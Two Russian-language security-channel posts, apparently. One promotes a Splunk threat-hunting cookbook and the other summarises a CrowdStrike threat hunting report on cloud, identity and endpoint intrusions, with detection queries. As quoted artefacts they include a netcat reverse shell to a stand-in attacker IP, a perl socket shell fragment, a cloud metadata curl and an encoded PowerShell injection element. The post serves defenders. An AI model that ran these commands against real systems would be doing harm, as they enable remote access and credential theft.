Fsecurity | HH

The Threat Hunter's Cookbook🔥 🍳 Что внутри Cookbook: 🐱 Готовые SPL-запросы — бери как есть или настраивай под себя 🛠 Методологии и стратегии охоты: от выбора техники до построения гипотез 🧰 Рекомендованные приложения, ресурсы и утилиты для прокачки SecOps 🎯 Идеально подойдёт тем, кто уже: • использует Splunk в охоте • хочет формализовать поиск по PEAK • ищет примеры, которые не теоретические, а боевые 🔗 https://www.splunk.com/en_us/form/threat-hunters-cookbook.html 🦔 THF

🫥 CrowdStrike 2025 Threat Hunting Report 👾 За год OverWatch обработали 215,000+ интерактивных сессий, в которых не сработали ни сигнатуры, ни ML. Только люди + охота. Все атаки — hands-on-keyboard. Что подметить из репорта: 🔀 Cross-Domain / Cloud: когда атакуют сразу всё 🕷️ BLOCKADE SPIDER: • Начал с уязвимого VPN → DCSync → lateral через WinRM / PsExec • Переходил с endpoint на cloud: bypass MFA, создание rogue IAM agent • Пробивал Entra ID: добавление в “IAM No MFA”, обход геофильтров • На unmanaged системах ставил Chisel proxy и устраивал SOCKS-туннели 📌 Зафиксированы попытки помешать Falcon Sensor 🐼 OPERATOR PANDA (Salt Typhoon): • Эксплуатация Cisco IOS/IOS XE (CVE-2023-20198 + CVE-2023-20273) • Создание локального пользователя → log sanitization → RCE • Удар по blind-spot: роутеры, VPN, свитчи, вне зоны действия EDR ☁️ Cloud: GENESIS vs MURKY PANDA 🐼 GENESIS PANDA: • Pivot из Jenkins в облако через IMDS → добавление SSH-ключей и access key • Использование CSP CLI и команд: curl http://IP/latest/meta-data/ aws s3 ls gcloud compute ssh ... • Жил в control plane, хостил payload на облачных инстансах • Использовал .NET тул для возвращения в консоль по backdoor key 🐼 MURKY PANDA: • Атака через trusted relationship → backdoor в Entra ID сервисные учётки • Компрометация стороннего Azure-провайдера → логины с NAS/VPS • Отмечена малварь CloudedHope, удаление логов и резкая OPSEC-дисциплина 🔐 Identity: SCATTERED SPIDER и MFA reset через helpdesk 📞 Социнженерия по телефону (vishing): • MFA reset → SSO логин → SharePoint → PAM → dump ntds.dit • Отслежено, как они: меняют IP на резидентские (NSOCKS) ищут "reset password" шаблоны работают ночью, чтобы не быть замеченными SaaS + Identity + Endpoint = полный доступ без вирусов. 🔍 Поиск по: DeviceLogonEvents | where AccountName endswith "@domain.com" | where Timestamp during non-business-hours | where LogonType == "RemoteInteractive" ⌨️ Endpoint: тихие APT и живые бэкдоры 🐼 GLACIAL PANDA: • Угроза телеком-сектора на Linux, скрытая и долгая • Эксплуатация CVE-2016-5195 (Dirty COW) + CVE-2021-4034 (PwnKit) • ShieldSlide: троянизированный OpenSSH (/usr/sbin/sshd) с логами auth + backdoor-пароль • Примеры артефактов: /usr/sbin/cron → изменённый daemon perl -e 'use Socket; ...' → reverse shell netcat -e /bin/bash attacker_ip • LOTL-движение, атаки между дочками компаний 🔍 Охота через: sha256sum /usr/sbin/sshd | grep -v known_good ps aux | grep cron | grep -v /usr/sbin/cron 🕳 Vulnerability Hunting: 🕷 GRACEFUL SPIDER: • Zero-Day в Cleo MFT (CVE-2024-55956) → bypass старого фикса CVE-2024-50623 • Этапы: Загрузка .zip → C:\VLTrader\temp\ В распаковке XML с параметром выполнения команды Внедрение shellcode → запуск пиратского Cobalt Strike • Использовал: <Mailbox type="system" command="powershell -enc ..." /> Falcon Sensor + OverWatch охота по: #event_simpleName=PeFileWritten ContextBaseFileName=java.exe TargetFileName!=/<known_good_files>/ ⚔️ Threat hunting требует выхода за границы одного домена. Только корреляция данных Identity + Cloud + Endpoint + Exposure позволяет отследить такие группировки, как BLOCKADE, OPERATOR, SCATTERED и PANDA-акторов. ☁️ Cloud = новая активная зона APT 🧬 Identity = entry + escalation 💣 Endpoint = persistence + эксфиль 🐱 SIEM и XDR = must have, чтобы не видеть только “что”, но и “почему” 🦔 THF